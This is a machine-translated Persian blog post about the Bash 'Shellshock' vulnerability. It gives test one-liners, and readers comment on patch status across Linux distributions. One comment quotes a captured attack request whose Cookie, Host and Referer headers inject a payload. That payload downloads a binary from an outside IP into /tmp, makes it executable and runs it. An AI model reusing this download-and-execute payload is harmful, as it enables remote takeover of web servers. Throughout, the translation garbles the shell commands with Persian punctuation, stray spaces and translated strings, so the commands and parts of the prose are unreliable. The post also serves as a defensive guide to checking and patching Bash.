Bash: آسیب پذیری جدید شناسایی شد (و ثابت شد)

این در برخی از وبلاگ ها مانند یک آتش سوزی در حال اجرا است ، یک داستان منتشر شده در وبلاگ امنیتی de ردهت درباره آسیب پذیری موجود در Bash به دلیل سوuse استفاده از متغیرهای جهانی. طبق خبر اصلی:

"... این آسیب پذیری به این دلیل است که می توان قبل از فراخوانی پوسته bash ، متغیرهای محیطی با مقادیر خاص ساخته شده ایجاد کرد. این متغیرها می توانند حاوی کدی باشند که به محض فراخوانی پوسته اجرا می شوند. نام این متغیرهای مفصل مهم نیست ، فقط محتوای آنها است. در نتیجه ، این آسیب پذیری در بسیاری از زمینه ها آشکار می شودبه عنوان مثال:

  • فرمان فورس در تنظیمات sshd برای فراهم کردن قابلیت اجرای محدود فرمان برای کاربران از راه دور استفاده می شود. از این نقص می توان برای جلوگیری از آن و اجرای خودسرانه دستور استفاده کرد. برخی از پیاده سازی های Git و Subversion از چنین پوسته های محدودی استفاده می کنند. استفاده منظم از OpenSSH تحت تأثیر قرار نمی گیرد زیرا کاربران از قبل به یک کنسول دسترسی دارند.
  • اگر اسکریپت های CGI هم به صورت bash و هم به صورت زیر سطح تخم ریزی شده باشند ، سرور Apache با استفاده از mod_cgi یا mod_cgid تحت تأثیر قرار می گیرد. در صورت استفاده از پوسته سیستم / exec در PHP ، از این زیر سطحها بطور ضمنی توسط system / popen در C ، توسط os.system / os.popen در پایتون استفاده می شود (هنگام اجرای در حالت CGI) ، و open / system در Perl (که به رشته فرمان بستگی دارد).
  • اسکریپت های PHP که با mod_php اجرا می شوند ، حتی در صورت پخش زیر سطح نیز تحت تأثیر قرار نمی گیرند.
  • سرویس گیرندگان DHCP برای پیکربندی سیستم ، با مقادیری که از یک سرور بالقوه مخرب گرفته شده ، اسکریپت های پوسته را فراخوانی می کنند. این اجازه می دهد تا دستورات دلخواه ، معمولاً به صورت root ، در دستگاه کلاینت DHCP اجرا شوند.
  • برنامه ها و برنامه های مختلف با امتیازات SUID می توانند اسکریپت های پوسته را با مقادیر متغیر محیطی تنظیم شده / تحت تأثیر کاربر اجرا کنند ، که به شما اجازه می دهد دستورات دلخواه اجرا شوند.
  • هر برنامه دیگری که به پوسته متصل شود یا اسکریپت پوسته ای را اجرا کند مانند استفاده از bash به عنوان مفسر. اسکریپت های پوسته ای که متغیرهایی را صادر نمی کنند ، حتی اگر محتوای نامعتبر را پردازش کرده و در آن ذخیره کنند ، در معرض این مشکل نیستند. متغیرهای پوسته (سمت چپ) و زیر سطح باز هستند.

"

چگونه بفهمم Bash من تحت تأثیر قرار گرفته است؟

با توجه به این ، یک روش بسیار ساده وجود دارد که بفهمیم تحت تأثیر این آسیب پذیری هستیم. در واقع ، من روی Antergos خود آزمایش کردم و ظاهرا مشکلی ندارم. کاری که ما باید انجام دهیم باز کردن یک ترمینال و قرار دادن موارد زیر است:

env x = '() {:؛}؛ echo آسیب پذیر 'bash -c "echo this is a test"

اگر از این طریق بیرون بیاید مشکلی نداریم:

env x = '() {:؛}؛ echo آسیب پذیر 'bash -c "echo this is a test" bash: هشدار: x: نادیده گرفتن تعریف تعریف عملکرد bash: خطا در تعریف تعریف عملکرد برای "x" این یک تست است

اگر نتیجه متفاوت است ، باید از کانال های به روزرسانی توزیع های ترجیحی ما استفاده کنید تا ببینید آیا آنها قبلاً وصله را اعمال کرده اند یا خیر. بنابراین شما می دانید

به روز شده: این خروجی از یک همکار با استفاده از اوبونتو 14:04 است:

env x = '() {:؛}؛ echo آسیب پذیر 'bash -c "echo this is a test" آسیب پذیر این یک آزمون است

همانطور که مشاهده می کنید ، تاکنون آسیب پذیر است.


محتوای مقاله به اصول ما پیوست اخلاق تحریریه. برای گزارش یک خطا کلیک کنید اینجا.

66 نظر ، نظر خود را بگذارید

نظر خود را بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخشهای موردنیاز علامتگذاری شدهاند با *

*

*

  1. مسئول داده ها: میگل آنخل گاتون
  2. هدف از داده ها: کنترل هرزنامه ، مدیریت نظرات.
  3. مشروعیت: رضایت شما
  4. ارتباط داده ها: داده ها به اشخاص ثالث منتقل نمی شوند مگر با تعهد قانونی.
  5. ذخیره سازی داده ها: پایگاه داده به میزبانی شبکه های Occentus (EU)
  6. حقوق: در هر زمان می توانید اطلاعات خود را محدود ، بازیابی و حذف کنید.

  1.   جرسون dijo

    من کوبونتو 14.04 از 64 دارم و همچنین:

    env x = '() {:؛}؛ echo آسیب پذیر 'bash -c "echo this is a test"
    اسیب پذیر
    این یک امتحان است

    من قبلاً بروزرسانی کردم ، اما تصحیح نمی شود. چه باید کرد؟

    1.    ایلاو dijo

      منتظر بمانید تا آنها به روز شوند. مثلاً eOS قبلاً به روز شده است ...

    2.    خوان dijo

      چقدر عجیب است ، من کوبونتو 14.04 را نیز دارم

      $ env x = '() {:؛}؛ echo آسیب پذیر 'bash -c "echo this is a test"
      bash: warning: x: نادیده گرفتن تلاش برای تعریف عملکرد
      bash: خطای وارد کردن تعریف عملکرد برای "x"
      این یک امتحان است

      1.    خوان dijo

        من اضافه می کنم که نسخه بسته "bash" که امروز بارگیری شد:
        4.3-7ubuntu 1.1

        http://packages.ubuntu.com/trusty/bash

    3.    eliotime3000 dijo

      در مورد من ، با دادن دستور ، فقط موارد زیر را در ترمینال به من می دهد:

      >

      به هر حال ، شوخی این است که من Debian Wheezy را به روز کردم و این چیزی است که مرا رها کرد.

      1.    یوکیترو dijo

        ویزی هنوز در قسمت دوم اشکال آسیب پذیر است ، حداقل برای بعد از ظهر (UTC -4: 30) مشکل هنوز به شرح زیر بود: /

  2.   پترچکو dijo

    من فقط تأیید کردم که بعد از اعمال به روزرسانی امروز ، نه Slackware و نه دبیان و نه Centos تحت تأثیر قرار نگرفتند زیرا یک به روزرسانی مربوطه دریافت کردند.

    چه چیزی اوبونتو را در این ساعت همچنان آسیب پذیر می کند؟ و به من بگو امن است: D.

    1.    خوان dijo

      اما آیا سعی کرده اید اوبونتو را به روز کنید؟
      با به روزرسانی امروز آنها نیز آن را رفع کرده اند.

      1.    پترچکو dijo

        OK

    2.    ربات dijo

      کارشناسان امنیتی در مورد آسیب پذیری "Bash" هشدار می دهند ، این می تواند تهدیدی بزرگتر از نقص Heartbleed برای کاربران نرم افزار Linux باشد ، جایی که "هکرها" می توانند از اشکال موجود در Bash برای کنترل کامل سیستم استفاده کنند.
      Tod Beardsley ، مدیر مهندسی در شرکت امنیت سایبری Rapid7 ، هشدار داد که این نقص به دلیل شدت آن 10 درجه است ، به این معنی که حداکثر تأثیر را دارد ، و برای پیچیدگی بهره برداری "کم" ارزیابی می شود ، این برای حملات "هکر" نسبتاً آسان است . با استفاده از این آسیب پذیری ، مهاجمان می توانند به طور بالقوه سیستم عامل را کنترل کنند ، به اطلاعات محرمانه دسترسی پیدا کنند ، تغییرات ایجاد کنند و غیره. " وی افزود: "کسی که سیستم هایی را به اشغال Bash درآورده است ، باید بلافاصله وصله را اعمال کند."
      قبل از این آسیب پذیری که ابزار قدیمی (GNU) را در محلی که Bach میزبان آن است ، ارائه می دهد ، راحت تر است که نرم افزار Linux از شر GNU خلاص شود و ابزار BSD را تغییر دهد.

      PS: آزادی بیان من را سانسور نکنید ، ... به کسی توهین نکنید ، ... پیام من را مانند پیام قبلی که حذف کرده ام حذف نکنید!

      1.    خشایکس dijo

        اوه لطفا زیاده روی نکنید چگونه من از کسانی که از BSD استفاده می کنند و GNU ، Linux یا هر چیز دیگری را از این پروژه ها تحقیر می کنند بیزارم.

      2.    پترچکو dijo

        من با شما هستم و از نظر شدت این حفره کاملاً درست می گویید.

      3.    دیازپان dijo

        این سانسور نبود ، بلکه افزونگی بود (شما همین نظر را در پست gnome 3.14 داده بودید)

      4.    کارکنان dijo

        «… و به دلیل پیچیدگی بهره برداری" پایین "رتبه بندی شده است ، به این معنی که حملات هکر نسبتاً آسان است"

        آیا عدم انسجام قابل توجه است؟
        چگونه می توان به راحتی از این آسیب پذیری بهره برد و در عین حال سطح "پایین" خطر را دارد زیرا استفاده از آن بسیار پیچیده است؟
        این یک اشکال است که طی چند ساعت پس از شناختن یکدیگر برطرف شده و مانند خونریزی قلبی ، هیچ گزارشی از بهره برداری از آن گزارش نشده است (البته این زمان کمتری برای شناختن یکدیگر است).
        این مطبوعات محرمانه است تا خطر واقعی.

      5.    پترچکو dijo

        آیا به نظر شماStaff بی اهمیت است؟ حالا به من چه خواهی گفت

        GET./.HTTP/1.0
        .کاربر-عامل: .ممنون-راب
        کوکی: (). {.:؛.} ؛. wget.-O./tmp/besh.http://162.253.66.76/nginx؛ .chmod.777. / tmp / besh؛ ./ tmp / besh؛
        . هاست: (). {.:؛.} ؛. wget.-O./tmp/besh.http://162.253.66.76/nginx؛ .chmod.777. / tmp / besh؛ ./ tmp / besh؛
        مراجعه کننده: (). {.:؛.} ؛. wget.-O./tmp/besh.http://162.253.66.76/nginx؛ .chmod.777. / tmp / besh؛ ./ tmp / besh؛
        .تایید کنید:. * / *

        $ فایل nginx
        nginx: ELF 32 بیتی LSB قابل اجرا ، Intel 80386 ، نسخه 1 (SYSV) ، از نظر ایستایی برای GNU / Linux 2.6.18 پیوند داده شده ، سلب شده

        $ md5sum nginx
        5924bcc045bb7039f55c6ce29234e29a nginx

        $ sha256s nginx
        73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx

        میدونی این چیه؟ از هیچ چیز خطرناک کمی ...

      6.    یوکیترو dijo

        اوضاع کاملاً جدی است ، اما از آنجا می توان گفت که شما باید از bash برای گزینه BSD استفاده نکنید ، در حال حاضر حداکثر است ، به هر حال به روزرسانی از قبل وجود دارد ، من فقط بروزرسانی را لمس می کنم و هیچ چیز دیگری.

        اکنون PD ، من فکر می کنم بیشتر از یک همکارrobet باشد ، من فکر نمی کنم که در اینجا مدیران خود را وقف حذف نظراتی مانند این کنند زیرا بله ، زیرا ، از آنجا که من در این جامعه شرکت کردم ، چنین احساسی داشتم و امیدوارم که همینطور می ماند

        سلام.

      7.    ایلاو dijo

        شما دقیقاً همان نظر را روی دو پست مختلف قرار دهید. اگر می خواهید "منبع" داستان را تبلیغ کنید ، ببخشید ، اینجا مکان نیست.

      8.    ماریو dijo

        Bash از یونیکس (و کلون GNU آن) می آید. سیستم های مبتنی بر BSD مانند OSX نیز تحت تأثیر قرار گرفته اند و طبق گفته Genbeta ، آنها هنوز آن را وصله نکرده اند. به همین ترتیب ، برای دسترسی به Bash به یک حساب کاربری ، محلی یا از طریق SSH نیاز دارید.

      9.    یوکیترو dijo

        @ کارمند:

        1.- به دلیل میزان خدماتی که می تواند تحت تأثیر اشکال قرار گیرد ، در سطح 10 (حداکثر سطح خطر) طبقه بندی می شود. در یادداشت اصلی ، آنها این واقعیت را کاملاً واضح و روشن می کنند ، با این استدلال که این اشکال می تواند بر سرویس هایی مانند apache ، sshd ، برنامه هایی با مجوز suid تأثیر بگذارد (xorg ، و غیره).

        2.- در مورد سطح پایین دشواری طبقه بندی می شود ، وقتی که نوبت به اجرای آن می رسد و بهترین نمونه آن اسکریپت تست آسیب پذیری است کهelav در پست قرار داده است. همانطور که می بینید اجرای آن بسیار دشوار است.

        من افزونگی را در اطلاعات نمی بینم (من فقط ترجمه گوگل را می بینم) و اگر مشكل كاملاً جدی باشد و همانطور كه ​​شما می گویید از قبل وصله و راه حلی دارد ، اما نه برای آن ، دیگر خطری نیست و کاملاً واقعی.

      10.    کارکنان dijo

        petercheco /Yukiteru

        من را اشتباه نگیرید ، من فکر می کنم روشن است که انتقاد من خبری است که Robet به آن پیوند می دهد و بر عدم تناسب و عدم اضافه کار متمرکز است.

        به همین ترتیب ، ما باید بین خطر و خطر تفاوت قائل شویم (من مورد آخر را ذکر نمی کنم) ، ما معمولاً از آنها به عنوان مترادف استفاده می کنیم ، اما در اینجا ، خطر ظرفیت خسارت اشکال است و احتمال وقوع آن را به خطر می اندازد.
        در مورد خاص من ، از دیروز وارد شدم. این برای لیست های پستی یا مواردی از این دست نبود. تلفن را برداشتم و با لینک به sysadmin پیغام دادم و تأیید کردم که همه چیز را وصله کرده ام ، پس ببخشید اما این اخبار مرا بیدار نمی کند.

      11.    ربات dijo

        در انجمن های دیگر آنها در مورد آسیب پذیری Bash ، "راه حلی که دبیان و اوبونتو منتشر کردند" اشاره کردند ، اما امروز آنها کشف کردند که هنوز یک آسیب پذیری وجود دارد ، بنابراین راه حل ناقص بود ، آنها اشاره کردند که!

        می بینم که بسیاری از من به دلیل واقعیت ساده جلوگیری از شدت آسیب پذیری افراد - دارای سطح حداکثر خطر 10 صحیح ، و ذکر راه حل های ممکن برای نرم افزار Linux قبل از ابزار منسوخ GNU که در آن Bash میزبانی می شود - که کاملا GNU می تواند انتقاد کند. با استفاده از ابزار BSD در نرم افزار لینوکس جایگزین شود ،… من همچنین از Linux استفاده می کنم و Linux را دوست دارم!

        من توضیح می دهم که Bash به طور پیش فرض در BSD نصب نمی شود ، این یک بسته سازگاری دیگر Linux است که می تواند در BSD نصب شود ... بله! و منبع قرار داده شده است تا آنها بتوانند اخبار را بررسی کنند ، زیرا بسیاری از کاربران بعضی اوقات پیام یا نظر را باور نمی کنند.

        1.    ایلاو dijo

          robet: همانطور که قبلاً بارها و بارها به شما گفته اند ، شما قبلاً نظر خود را با اخبار در یک پست قرار داده اید ، لازم نیست آن را در هر پستی که نظر می دهید قرار دهید.

          در bash پوسته های دیگری وجود دارد که می تواند در صورت آسیب پذیری Bash استفاده شود. 😉

      12.    ماریو dijo

        Robet ، از نظر من هیچ نرم افزاری وجود ندارد که هسته لینوکس را با سرزمین کاربر BSD ترکیب کند. نزدیکترین چیز برعکس است ، kBSD + GNU ، مانند جنتو و دبیان. علاوه بر این ، اگر بعد از BSD (1983) باشد نمی توان GNU (1977) را "به سبک قدیمی" نامید. هر دو ریشه یونیکس خود را دارند (اما کد آن را ندارند) ، اگر Bash از زمانی که Linus T هنوز بچه بود ایجاد می شد "سازگاری با Linux" وجود ندارد.

  3.   مانوئل پرزف dijo

    uff ، آزمایش دبیان در این زمان "آسیب پذیر" است که چه خطی داریم ...

    1.    mrcelhw dijo

      من از Debian Testing استفاده می کنم و حتی در این شاخه ما به روزرسانی bash را دریافت کرده ایم

  4.   دیازپان dijo

    طبق genbeta یک آسیب پذیری دیگر نیز وجود دارد
    http://seclists.org/oss-sec/2014/q3/685

    دستور مشورت است
    env X = '() {(a) => \' sh -c "پژواک آسیب پذیر"؛ bash -c "echo Failure 2 unpatched"

    1.    ایلاو dijo
      env X = '() {(a) => \' sh -c "پژواک آسیب پذیر"؛ bash -c "echo Unpatched Failure 2" sh: X: line 1: خطای نحوی در نزدیکی عنصر غیر منتظره `= 'sh: X: line 1:" sh: خطای تعریف عملکرد وارد کردن برای "X" sh: آسیب پذیر: دستور پیدا نشد شکست 2 بدون وصله
      
      1.    دیازپان dijo

        همان من

      2.    گیسکارد dijo

        اینجا هم همینطور. اما اشکال اصلی در این پست در (L) اوبونتو 14.04 وصله شده است

      3.    x11tete11x dijo

        به جای انجام یک تکرار ساده ، سعی کنید دستورالعملی را اجرا کنید که به امتیازات احتیاج دارد ، من "امتیازات ناکافی" می اندازم ... این اشکال امتیازات را تشدید نمی کند؟ اگر امتیازات را تشدید نکند ، به همان اندازه که آنها آن را رنگ می کنند خطرناک نیست .

      4.    Xurxo dijo

        حق با شماست!! آنها دو آسیب پذیر بودند ...

        برای من در Linux Mint 17 پس از دومین به روزرسانی bash که آنها شب گذشته در مخازن اوبونتو قرار دادند ، با اجرای این دستور پوسته این خروجی را ارائه می دهد:

        env X = '() {(a) => \' sh -c "پژواک آسیب پذیر"؛ bash -c "echo Fail 2 unpatched"
        >

        نسخه "bassh" که برای به روزرسانی موارد قبلی در مخازن اوبونتو قرار داده شده است:

        4.3-7ubuntu 1.2

        در سیستم های مشتق شده از دبیان می توانید نسخه نصب شده را با این دستور بررسی کنید:

        dpkg -s bash | نسخه grep

        در هر صورت ، باید حداقل برای کاربران دبیان ، اوبونتو و مینت روشن شود. شما نباید زیاد نگران برنامه هایی باشید که اسکریپت ها را با هدر #! / bin / sh اجرا می کنند زیرا در آن توزیع ها / bin / sh "bash" نمی نامد ، بلکه به پوسته "dash" متصل می شود (dash :)

        کنسول Debian Alchemist (داش) یک کنسول POSIX مشتق شده است
        خاکستر
        .
        از آنجا که اسکریپت ها را سریعتر از bash اجرا می کند و وابستگی کمتری دارد
        کتابخانه ها (باعث می شود در برابر خرابی نرم افزار مقاومت بیشتری داشته باشد یا
        سخت افزار) ، به عنوان کنسول پیش فرض سیستم در سیستم ها استفاده می شود
        دبیان

        بنابراین ، حداقل در اوبونتو ، "bash" به عنوان پوسته ای برای ورود کاربر (همچنین برای کاربر ریشه) استفاده می شود. اما هر کاربر می تواند به طور پیش فرض از پوسته دیگری برای کاربر و کنسول های ریشه (پایانه ها) استفاده کند.

        با اجرای این دستورات آسان است که بررسی کنید پوسته اسکریپت ها را اجرا می کند (#! / Bin / sh):

        پرونده / bin / sh
        (خروجی / bin / sh است: پیوند نمادین به "خط") ما ردیابی را که دستور را تکرار می کند دنبال می کنیم

        file / bin / dash
        (خروجی / bin / dash است: ELF 64-bit LSB object مشترک ، x86-64 ، نسخه 1 (SYSV) بنابراین این قابل اجرا است.

        این نتایج مربوط به توزیع Linux Mint 17. است که در سایر توزیع های غیر اوبونتو / دبیان ممکن است متفاوت باشد.

        تغییر پوسته پیش فرض کار سختی نیست !! حتی می توانید از یکی دیگر برای کاربران و کاربر اصلی استفاده کنید. در واقع شما فقط باید پوسته مورد نظر خود را نصب کنید و با دستور "chsh" یا با ویرایش پرونده / etc / passwd پیش فرض را تغییر دهید (اگرچه کاربرانی که هنگام ویرایش پرونده "passwd" از عواقب خطا اطلاع ندارند ، بهتر است که آنها خود را خیلی خوب آگاه کنند و قبل از ویرایش ، در صورت لزوم بازیابی ، از نسخه اصلی آن استفاده کنند).

        من با "tcsh" راحت ترم (tcsh :)

        کنسول TENEX C ، نسخه بهبود یافته csh برکلی

        "Csh" همان چیزی است که Mac OS X چند سال پیش استفاده کرده است. که با توجه به اینکه بیشتر سیستم عامل اپل کد FreeBSD است منطقی است. اکنون از آنچه دیروز خواندم ، به نظر می رسد که آنها "bash" را نیز برای پایانه های کاربر ارائه می دهند.

        نتیجه گیری:

        - نسخه های "bash" وصله شده "برای پرکاربردترین توزیع ها" قبلاً توزیع شده اند
        - "bash" نسخه 4.3-7ubuntu1.2 به بعد حاوی این اشکالات نیست
        - استفاده از "bash" در سیستم عامل * لینوکس اجباری نیست
        - تعداد کمی * لینک توزیع لینوکس #! / Bin / sh با "bash"
        - گزینه های دیگری وجود دارد: ash ، dash ، csh ، tcsh و برخی دیگر
        - تغییر پوسته پیش فرض که سیستم هنگام باز کردن یک ترمینال فراخوانی می کند کار دشواری نیست
        - تعداد کمی از دستگاه های کوچک (روترها و دیگران) از "bash" استفاده می کنند ، زیرا بسیار بزرگ است !!

      5.    Xurxo dijo

        همین حالا به روزرسانی دیگری وارد شده است که نسخه دیگری از "bash" 4.3-7ubuntu1.3 را نصب می کند

        برای Linux Mint 17 و Ubuntu 14.04.1 LTS

        1.    ایلاو dijo

          ArchLinux وارد نسخه bash-4.3.026-1 شد

    2.    ربات dijo

      @ Xurxo c .csh از برکلی؟ ،… شما چیزی را که در بالا صحبت کردم درک می کنید و بهتر است از "csh" BSD استفاده کنید تا ابزار قدیمی GNU که Bash در آن میزبانی می کند. این ابزار بهترین نرم افزار برای لینوکس است.

  5.   ناموجود dijo

    من حدس می زنم این اشکال است

    https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760

    درست است، واقعی؟

  6.   گونزالو dijo

    و راه حل چه خواهد بود؟

    1.    ایلاو dijo

      منتظر بمانید تا آنها بسته را در distro شما به روز کنند

  7.   دیازپان dijo

    این اشکال به عنوان پوسته پوسته تعمید داده شد
    http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/

  8.   پابلو ایوان کوره dijo

    اسیب پذیر
    این یک امتحان است

    هنوز وصله ای برای اوبونتو استودیو 14.04 وجود ندارد

    1.    ویسپ dijo

      در اوبونتو استودیو 14.04.1 تعمیر شده است
      wisp @ ubuntustudio: ~ $ env x = '() {:؛}؛ echo آسیب پذیر 'bash -c "echo this is a test"
      bash: warning: x: نادیده گرفتن تلاش برای تعریف عملکرد
      bash: خطای وارد کردن تعریف عملکرد برای "x"
      این یک امتحان است

  9.   رهرو dijo

    در واقع این یک آسیب پذیری جزئی است ، اگر بر شما تأثیر بگذارد اینست که قبلاً کار اشتباهی انجام داده اید ...

    زیرا اسکریپت bash که با امتیازات root اجرا می شود ، هرگز نباید در معرض دید کاربر باشد. و اگر او بدون امتیاز بدود ، چنین قدرت جسمی وجود ندارد. در واقع احمقانه است ترسناک است

    1.    خشایکس dijo

      من هم همینطور فکر می کنم.

    2.    کارکنان dijo

      دقیقاً ، برای فروش روزنامه های بیشتر یا بازدید بیشتر ، این اشکالات خوب است.
      اما آنها همیشه فراموش می کنند که برای به خطر انداختن رایانه با این نوع اسکریپت ها ، ابتدا باید به bash دسترسی داشته باشید و سپس آن را به عنوان root داشته باشید.

      1.    داریو dijo

        اگر از apache همراه با cgi استفاده می کنید ، فقط عناوین http را به عنوان کوکی یا ارجاع عملکردی که می خواهید اجرا کنید قرار دهید. حتی از آن برای پخش کرم نیز استفاده شده است.

    3.    داریو dijo

      و اگر کسی پوسته ای را با wget mishell.php به سرور قرار دهد ، در این صورت جدی نیست ، درست است؟

    4.    eliotime3000 dijo

      با شما موافقم. من فکر کردم این یک اشکال بزرگ است مانند آنچه در Heartbleed وجود دارد (حتی NSA خود را برای تأمین سوخت وام داد) ، اما بعد از همه این یک اشکال جزئی بود.

      اشکالات جدی دیگری نیز وجود دارد مانند مصرف دیوانه وار Flash و افت عملکرد در Pepper Flash Player ، و موردی که قبلا رفع شده است اشکال webRTC در Chrome و Firefox.

  10.   بایندرمن dijo

    آیا می دانید برای افرادی که از Linux Mint 16 استفاده می کنند ترتیب خاصی دارد؟

  11.   جایزه اسکار dijo

    در تست دبیان از قبل برطرف شده بود.

  12.   نوعی اسباب بازی بچگانه dijo

    در 5 وضعیت من حل شده است ، در سیستم عامل X X من نمی دانم.

    لطفا نظر من را سانسور نکنید ، من گفتم OS X. من نمی دانم آیا می توانید OS X را در این سایت بگویید.

    1.    تانهاوسر dijo

      yoyo خوب زیاد این موضوع را فریاد نزن که آنها هنوز روی برخی از جزئیات پچ کار می کنند ... این را امتحان کنید و سپس به من بگویید چگونه XD

      env x = '() {:؛}؛ echo آسیب پذیر 'bash -c "echo من آسیب پذیرتر از سطل زباله آیفون 6 هستم"

      اگر آنها 100٪ قبل از OS X آن را حل کرده اند من شرط می بندم

    2.    eliotime3000 dijo

      خوب ، حتی در Ars Technica آنها به Bash در OSX اهمیت می دهند.

    3.    ایلاو dijo

      Yoyo نظر بعدی در مورد OS X برای SPAM .. lla tu save ..

  13.   تانهاوسر dijo

    yoyo آنجا هست تا نقل قول ها را برطرف کنی ... اما بقیه را می دانی

    1.    eliotime3000 dijo

      مانند اینکه آنها تحت حمایت OSX قرار گرفته اند (زیرا OSX هنوز از Bash: v استفاده می کند).

      به هر حال من نیازی نیست اینقدر با دبیان جسی خرابکاری کنم.

  14.   elhui2 dijo

    اگر سیستم در Cent OS آسیب پذیر است:
    yum تمیز کردن && yum bash update

    برای دیدن نسخه bash:
    دور در دقیقه -qa | گرپ باش

    اگر نسخه قبل از bash-4.1.2-15.el6_5.1 باشد ، سیستم شما ممکن است آسیب پذیر باشد!

    سلام.

  15.   مانوئل پرزف dijo

    آسیب پذیری دوم هنوز برطرف نشده است

    env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"؛ bash -c "echo Failure 2 unpatched"

  16.   عیسی پرالس dijo

    در حال بروز رسانی ...

  17.   سوئیچر dijo

    برعکس این اتفاق برای من در جنتو رخ می دهد ، من فقط در برابر شکست اول آسیب پذیر هستم اما با دومین بار این را می گیرم:
    [کد] sh: X: خط 1: خطای نحوی در نزدیکی عنصر غیر منتظره "="
    sh: X: خط 1: "
    sh: خطای وارد کردن تعریف عملکرد برای "X"
    sh: آسیب پذیر: فرمان یافت نشد
    اشکال 2 وصله نشده است
    [/ CODE]
    من نمی دانم که آیا نسخه با ثباتی از Bash با اشکالات رفع شده وجود دارد یا خیر ، اما به هر ترتیب برای دفعه بعدی که من ظهور - sync && emerge - update - عمیق - با-bdeps = و - را در حالت تعلیق در انتظار خواهیم بود. newuseworld (در این مرحله تمام سیستم را به روز می کنم).

    1.    یوکیترو dijo

      من جنتو با نسخه 4.2_p50 دارم و تا الان همه تست ها رو پس داده. emerging –sync و سپس -av1 app-shells / bash را امتحان کنید و سپس با استفاده از دستور bash –version بررسی کنید که نسخه 4.2_p50 را دارید.

  18.   فرچه dijo

    آیا این را امتحان کرده اید؟

    و با بسته های جدید ، آزمایشی جدید که Red Hat به ما ارائه می دهد

    cd / tmp؛ rm -f / tmp / echo؛ env 'x = () {(a) => \' bash -c "echo date"؛ cat / tmp / echo

    اگر سیستم ما آسیب پذیر نیست و به درستی وصله خورده است ، باید چیزی شبیه این به ما بدهد
    1 تاریخ
    2 cat: / tmp / echo: پرونده یا فهرست موجود نیست

  19.   یوکیترو dijo

    این روش را امتحان کنید:

    env X = '() {(a) => \' sh -c "پژواک آسیب پذیر"؛ bash -c "echo Failure 2 patch"

    می گیرم

    اسیب پذیر
    اشکال 2 وصله.

    1.    یوکیترو dijo

      فراموشش کن ، خط بد قالب بندی شده است.

  20.   اسکار مزا dijo

    عالی! من قبلاً به روزرسانی Slackware خود را انجام داده ام ، متشکرم!

  21.   لوتبروک dijo

    سلام ، من یک سوال دارم ، من چندین سرور با 10 بیت "SUSE Linux Enterprise Server 64" دارم.
    وقتی دستوراتی را اجرا می کنم که آسیب پذیر هستم ، حتی از سطل آشغال iPhone 6 xD نیز آسیب پذیر ترم
    اگر من در به روزرسانی / نصب بسته ها در SUSE اشتباه نکنم ، این کار با دستور «zypper» انجام می شود.

    در بعضی از سرورها این را به من می گوید:

    BIAL: ~ # زیپ به بالا
    -bash: zypper: دستور پیدا نشد
    BIAL: ~ #

    و در دیگران این:

    SMB: z # زیپ به بالا
    بازیابی منابع سیستم
    تجزیه فراداده SUSE Linux Enterprise Server 10 SP2-20100319-161944
    تجزیه پایگاه داده RPM ...
    خلاصه:
    کاری برای انجام دادن نیست.

    من چکار می کنم
    من می دانم که برخی می گویند آسیب پذیری کمتر از آن است که آنها آن را رنگ آمیزی می کنند ، اما من آن را دارم و نمی خواهم در معرض خطر ، کوچک یا بزرگ قرار بگیرم.

    سلام.

  22.   سندرز گوتیرز dijo

    شب بخیر ، سعی کردم کدی را که در مقاله ارائه کرده اید بچسبانم ، این را دریافت کردم
    sanders @ pc-sanders: ~ $ env x = '() {:؛}؛ echo آسیب پذیر 'bash -c "echo this is a test"
    این یک امتحان است
    sanders @ pc-sanders: ~ $
    لطفاً برای من توضیح دهید که چگونه distro را وصله کنم ، من روزانه به روز می کنم و هیچ تغییری در خروجی سریع نمی بینم.

    خیلی از شما متشکرم!